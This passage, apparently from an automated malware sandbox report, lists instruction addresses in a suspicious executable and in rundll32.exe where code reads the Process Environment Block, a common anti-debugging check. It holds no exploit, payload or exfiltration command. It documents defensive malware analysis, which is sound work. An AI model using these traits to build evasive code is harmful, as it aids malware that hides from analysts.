          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]2_2_00AD0EA5
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A846A7 mov eax, dword ptr fs:[00000030h]2_2_00A846A7
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9FE87 mov eax, dword ptr fs:[00000030h]2_2_00A9FE87
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A316E0 mov ecx, dword ptr fs:[00000030h]2_2_00A316E0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A176E2 mov eax, dword ptr fs:[00000030h]2_2_00A176E2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A48EC7 mov eax, dword ptr fs:[00000030h]2_2_00A48EC7
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ABFEC0 mov eax, dword ptr fs:[00000030h]2_2_00ABFEC0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A336CC mov eax, dword ptr fs:[00000030h]2_2_00A336CC
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8ED6 mov eax, dword ptr fs:[00000030h]2_2_00AD8ED6
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0E620 mov eax, dword ptr fs:[00000030h]2_2_00A0E620
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ABFE3F mov eax, dword ptr fs:[00000030h]2_2_00ABFE3F
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0C600 mov eax, dword ptr fs:[00000030h]2_2_00A0C600
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0C600 mov eax, dword ptr fs:[00000030h]2_2_00A0C600
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0C600 mov eax, dword ptr fs:[00000030h]2_2_00A0C600
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A38E00 mov eax, dword ptr fs:[00000030h]2_2_00A38E00
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1608 mov eax, dword ptr fs:[00000030h]2_2_00AC1608
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A61C mov eax, dword ptr fs:[00000030h]2_2_00A3A61C
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A61C mov eax, dword ptr fs:[00000030h]2_2_00A3A61C
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1766D mov eax, dword ptr fs:[00000030h]2_2_00A1766D
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]2_2_00A2AE73
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]2_2_00A2AE73
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]2_2_00A2AE73
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]2_2_00A2AE73
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]2_2_00A2AE73
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]2_2_00A17E41
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]2_2_00A17E41
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]2_2_00A17E41
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]2_2_00A17E41
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]2_2_00A17E41
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]2_2_00A17E41
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACAE44 mov eax, dword ptr fs:[00000030h]2_2_00ACAE44
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACAE44 mov eax, dword ptr fs:[00000030h]2_2_00ACAE44
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A18794 mov eax, dword ptr fs:[00000030h]2_2_00A18794
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87794 mov eax, dword ptr fs:[00000030h]2_2_00A87794
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87794 mov eax, dword ptr fs:[00000030h]2_2_00A87794
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87794 mov eax, dword ptr fs:[00000030h]2_2_00A87794
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A437F5 mov eax, dword ptr fs:[00000030h]2_2_00A437F5
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A04F2E mov eax, dword ptr fs:[00000030h]2_2_00A04F2E
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A04F2E mov eax, dword ptr fs:[00000030h]2_2_00A04F2E
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3E730 mov eax, dword ptr fs:[00000030h]2_2_00A3E730
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD070D mov eax, dword ptr fs:[00000030h]2_2_00AD070D
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD070D mov eax, dword ptr fs:[00000030h]2_2_00AD070D
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A70E mov eax, dword ptr fs:[00000030h]2_2_00A3A70E
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A70E mov eax, dword ptr fs:[00000030h]2_2_00A3A70E
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2F716 mov eax, dword ptr fs:[00000030h]2_2_00A2F716
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9FF10 mov eax, dword ptr fs:[00000030h]2_2_00A9FF10
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9FF10 mov eax, dword ptr fs:[00000030h]2_2_00A9FF10
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1FF60 mov eax, dword ptr fs:[00000030h]2_2_00A1FF60
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8F6A mov eax, dword ptr fs:[00000030h]2_2_00AD8F6A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1EF40 mov eax, dword ptr fs:[00000030h]2_2_00A1EF40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA44B mov eax, dword ptr fs:[00000030h]4_2_045EA44B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D746D mov eax, dword ptr fs:[00000030h]4_2_045D746D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464C450 mov eax, dword ptr fs:[00000030h]4_2_0464C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464C450 mov eax, dword ptr fs:[00000030h]4_2_0464C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]4_2_04671C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468740D mov eax, dword ptr fs:[00000030h]4_2_0468740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468740D mov eax, dword ptr fs:[00000030h]4_2_0468740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468740D mov eax, dword ptr fs:[00000030h]4_2_0468740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636C0A mov eax, dword ptr fs:[00000030h]4_2_04636C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636C0A mov eax, dword ptr fs:[00000030h]4_2_04636C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636C0A mov eax, dword ptr fs:[00000030h]4_2_04636C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636C0A mov eax, dword ptr fs:[00000030h]4_2_04636C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EBC2C mov eax, dword ptr fs:[00000030h]4_2_045EBC2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636CF0 mov eax, dword ptr fs:[00000030h]4_2_04636CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636CF0 mov eax, dword ptr fs:[00000030h]4_2_04636CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636CF0 mov eax, dword ptr fs:[00000030h]4_2_04636CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046714FB mov eax, dword ptr fs:[00000030h]4_2_046714FB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688CD6 mov eax, dword ptr fs:[00000030h]4_2_04688CD6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C849B mov eax, dword ptr fs:[00000030h]4_2_045C849B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D7D50 mov eax, dword ptr fs:[00000030h]4_2_045D7D50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F3D43 mov eax, dword ptr fs:[00000030h]4_2_045F3D43
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04633540 mov eax, dword ptr fs:[00000030h]4_2_04633540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04663D40 mov eax, dword ptr fs:[00000030h]4_2_04663D40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DC577 mov eax, dword ptr fs:[00000030h]4_2_045DC577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DC577 mov eax, dword ptr fs:[00000030h]4_2_045DC577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0463A537 mov eax, dword ptr fs:[00000030h]4_2_0463A537
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688D34 mov eax, dword ptr fs:[00000030h]4_2_04688D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467E539 mov eax, dword ptr fs:[00000030h]4_2_0467E539
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E4D3B mov eax, dword ptr fs:[00000030h]4_2_045E4D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E4D3B mov eax, dword ptr fs:[00000030h]4_2_045E4D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E4D3B mov eax, dword ptr fs:[00000030h]4_2_045E4D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]4_2_045C3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BAD30 mov eax, dword ptr fs:[00000030h]4_2_045BAD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467FDE2 mov eax, dword ptr fs:[00000030h]4_2_0467FDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467FDE2 mov eax, dword ptr fs:[00000030h]4_2_0467FDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467FDE2 mov eax, dword ptr fs:[00000030h]4_2_0467FDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467FDE2 mov eax, dword ptr fs:[00000030h]4_2_0467FDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04668DF1 mov eax, dword ptr fs:[00000030h]4_2_04668DF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]4_2_04636DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]4_2_04636DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]4_2_04636DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov ecx, dword ptr fs:[00000030h]4_2_04636DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]4_2_04636DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]4_2_04636DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CD5E0 mov eax, dword ptr fs:[00000030h]4_2_045CD5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CD5E0 mov eax, dword ptr fs:[00000030h]4_2_045CD5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046805AC mov eax, dword ptr fs:[00000030h]4_2_046805AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046805AC mov eax, dword ptr fs:[00000030h]4_2_046805AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EFD9B mov eax, dword ptr fs:[00000030h]4_2_045EFD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EFD9B mov eax, dword ptr fs:[00000030h]4_2_045EFD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]4_2_045B2D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]4_2_045B2D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]4_2_045B2D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]4_2_045B2D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]4_2_045B2D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581 mov eax, dword ptr fs:[00000030h]4_2_045E2581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581 mov eax, dword ptr fs:[00000030h]4_2_045E2581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581 mov eax, dword ptr fs:[00000030h]4_2_045E2581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581 mov eax, dword ptr fs:[00000030h]4_2_045E2581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E1DB5 mov eax, dword ptr fs:[00000030h]4_2_045E1DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E1DB5 mov eax, dword ptr fs:[00000030h]4_2_045E1DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E1DB5 mov eax, dword ptr fs:[00000030h]4_2_045E1DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E35A1 mov eax, dword ptr fs:[00000030h]4_2_045E35A1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]4_2_045C7E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]4_2_045C7E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]4_2_045C7E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]4_2_045C7E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]4_2_045C7E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]4_2_045C7E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467AE44 mov eax, dword ptr fs:[00000030h]4_2_0467AE44
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467AE44 mov eax, dword ptr fs:[00000030h]4_2_0467AE44
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]4_2_045DAE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]4_2_045DAE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]4_2_045DAE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]4_2_045DAE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]4_2_045DAE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C766D mov eax, dword ptr fs:[00000030h]4_2_045C766D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA61C mov eax, dword ptr fs:[00000030h]4_2_045EA61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA61C mov eax, dword ptr fs:[00000030h]4_2_045EA61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0466FE3F mov eax, dword ptr fs:[00000030h]4_2_0466FE3F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BC600 mov eax, dword ptr fs:[00000030h]4_2_045BC600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BC600 mov eax, dword ptr fs:[00000030h]4_2_045BC600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BC600 mov eax, dword ptr fs:[00000030h]4_2_045BC600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E8E00 mov eax, dword ptr fs:[00000030h]4_2_045E8E00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671608 mov eax, dword ptr fs:[00000030h]4_2_04671608
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BE620 mov eax, dword ptr fs:[00000030h]4_2_045BE620
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E36CC mov eax, dword ptr fs:[00000030h]4_2_045E36CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F8EC7 mov eax, dword ptr fs:[00000030h]4_2_045F8EC7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0466FEC0 mov eax, dword ptr fs:[00000030h]4_2_0466FEC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688ED6 mov eax, dword ptr fs:[00000030h]4_2_04688ED6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E16E0 mov ecx, dword ptr fs:[00000030h]4_2_045E16E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C76E2 mov eax, dword ptr fs:[00000030h]4_2_045C76E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046346A7 mov eax, dword ptr fs:[00000030h]4_2_046346A7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04680EA5 mov eax, dword ptr fs:[00000030h]4_2_04680EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04680EA5 mov eax, dword ptr fs:[00000030h]4_2_04680EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04680EA5 mov eax, dword ptr fs:[00000030h]4_2_04680EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464FE87 mov eax, dword ptr fs:[00000030h]4_2_0464FE87
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688F6A mov eax, dword ptr fs:[00000030h]4_2_04688F6A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CEF40 mov eax, dword ptr fs:[00000030h]4_2_045CEF40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CFF60 mov eax, dword ptr fs:[00000030h]4_2_045CFF60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DF716 mov eax, dword ptr fs:[00000030h]4_2_045DF716
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA70E mov eax, dword ptr fs:[00000030h]4_2_045EA70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA70E mov eax, dword ptr fs:[00000030h]4_2_045EA70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468070D mov eax, dword ptr fs:[00000030h]4_2_0468070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468070D mov eax, dword ptr fs:[00000030h]4_2_0468070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EE730 mov eax, dword ptr fs:[00000030h]4_2_045EE730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464FF10 mov eax, dword ptr fs:[00000030h]4_2_0464FF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464FF10 mov eax, dword ptr fs:[00000030h]4_2_0464FF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B4F2E mov eax, dword ptr fs:[00000030h]4_2_045B4F2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B4F2E mov eax, dword ptr fs:[00000030h]4_2_045B4F2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F37F5 mov eax, dword ptr fs:[00000030h]4_2_045F37F5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C8794 mov eax, dword ptr fs:[00000030h]4_2_045C8794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04637794 mov eax, dword ptr fs:[00000030h]4_2_04637794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04637794 mov eax, dword ptr fs:[00000030h]4_2_04637794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04637794 mov eax, dword ptr fs:[00000030h]4_2_04637794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D0050 mov eax, dword ptr fs:[00000030h]4_2_045D0050
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D0050 mov eax, dword ptr fs:[00000030h]4_2_045D0050
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04672073 mov eax, dword ptr fs:[00000030h]4_2_04672073
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04681074 mov eax, dword ptr fs:[00000030h]4_2_04681074
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E002D mov eax, dword ptr fs:[00000030h]4_2_045E002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E002D mov eax, dword ptr fs:[00000030h]4_2_045E002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E002D mov eax, dword ptr fs:[00000030h]4_2_045E002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E002D mov eax, dword ptr fs:[00000030h]4_2_045E002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E002D mov eax, dword ptr fs:[00000030h]4_2_045E002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04637016 mov eax, dword ptr fs:[00000030h]4_2_04637016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04637016 mov eax, dword ptr fs:[00000030h]4_2_04637016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04637016 mov eax, dword ptr fs:[00000030h]4_2_04637016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CB02A mov eax, dword ptr fs:[00000030h]4_2_045CB02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CB02A mov eax, dword ptr fs:[00000030h]4_2_045CB02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CB02A mov eax, dword ptr fs:[00000030h]4_2_045CB02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CB02A mov eax, dword ptr fs:[00000030h]4_2_045CB02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04684015 mov eax, dword ptr fs:[00000030h]4_2_04684015
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04684015 mov eax, dword ptr fs:[00000030h]4_2_04684015
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464B8D0 mov eax, dword ptr fs:[00000030h]4_2_0464B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464B8D0 mov ecx, dword ptr fs:[00000030h]4_2_0464B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464B8D0 mov eax, dword ptr fs:[00000030h]4_2_0464B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464B8D0 mov eax, dword ptr fs:[00000030h]4_2_0464B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464B8D0 mov eax, dword ptr fs:[00000030h]4_2_0464B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464B8D0 mov eax, dword ptr fs:[00000030h]4_2_0464B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B58EC mov eax, dword ptr fs:[00000030h]4_2_045B58EC
